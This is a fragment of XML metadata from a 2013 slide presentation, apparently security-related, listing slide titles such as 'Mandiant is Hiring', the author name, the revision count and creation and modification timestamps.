      <vt:lpstr>Q&amp;A</vt:lpstr>
      <vt:lpstr>Mandiant is Hiring</vt:lpstr>
      <vt:lpstr>Sources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Click to add title</dc:title>
  <cp:lastModifiedBy>mscutt</cp:lastModifiedBy>
  <cp:revision>105</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-05-16T03:15:11Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-11-26T19:54:32Z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0x010100A1F7B1C06811DE48B1835960C3D644C9</vt:lpwstr>
  </property>
</Properties>
</file>